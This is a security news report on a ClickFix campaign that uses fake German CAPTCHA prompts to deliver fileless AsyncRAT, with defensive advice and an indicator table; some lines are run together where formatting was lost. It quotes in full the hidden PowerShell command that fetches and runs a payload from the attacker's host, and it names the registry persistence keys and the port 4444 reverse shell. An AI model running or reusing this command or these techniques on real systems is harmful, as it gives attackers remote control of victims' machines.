A sophisticated cyberattack campaign targeting German-speaking users has been discovered, exploiting fake CAPTCHA verification prompts to deploy a fileless variant of AsyncRAT.
The malware operates entirely in memory, evading traditional detection methods while enabling full remote access to compromised systems.
The campaign begins on a spoofed “Clickfix” verification page. When users click “Ich bin kein Roboter” (German for “I’m not a robot”), a malicious PowerShell command is copied to their clipboard, accompanied by instructions to execute it via Command Prompt. The command:
powershellconhost.exe --headless powershell -w hidden -nop -c $x = [System.Text.Encoding]::UTF8.GetString((Invoke-webrequest -URI 'http://namoet[.]de:80/x').Content); cmd /c $x
conhost.exe (a legitimate Windows console host) to mask PowerShell activity.-w hidden (hidden window) and -nop (no profile loading) to avoid suspicion.x) from namoet[.]de, which decodes to an in-memory .NET loader.The PowerShell payload executes a multi-step fileless attack chain:
HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce and HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows to ensure re-execution on reboot.=gClRmL0V2btFmbl) to reveal the C2 server address: namoet[.]de:4444.Add-Type, establishing a TCP connection to the C2 server. The code enables: Attribution to AsyncRAT:
Add-Type to compile malicious code dynamically, a hallmark of AsyncRAT campaigns.conhost.exe from launching PowerShell with hidden flags via AppLocker or EDR solutions.RunOnce or Windows\win keys.namoet[.]de and IP ranges 109.250.108.0/22.Impact: Compromised systems grant attackers full remote control, enabling data theft, lateral movement, and long-term infiltration all without requiring files to be dropped to disk.
This campaign highlights the growing abuse of legitimate tools (LOLBins) and fileless techniques to bypass defenses. Organizations must prioritize memory scanning, behavioral analysis, and proactive threat-hunting to counter such evolving threats.
| Indicator Type | Value | Use |
|---|---|---|
| IP | 109.250.111[.]155 | Clickfix Delivery |
| FQDN | namoet[.]de | Clickfix / Command & Control server |
| Port | 4444 | TCP reverse shell listener port |
| URL | hxxp[:]//namoet[.]de:80/x | PowerShell payload |
| Registry (HKCU) | SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windows | RunOnce key ensures persistence on next boot |
| Registry (HKCU) | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\win | Windows\win holds obfuscated PowerShell command |
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…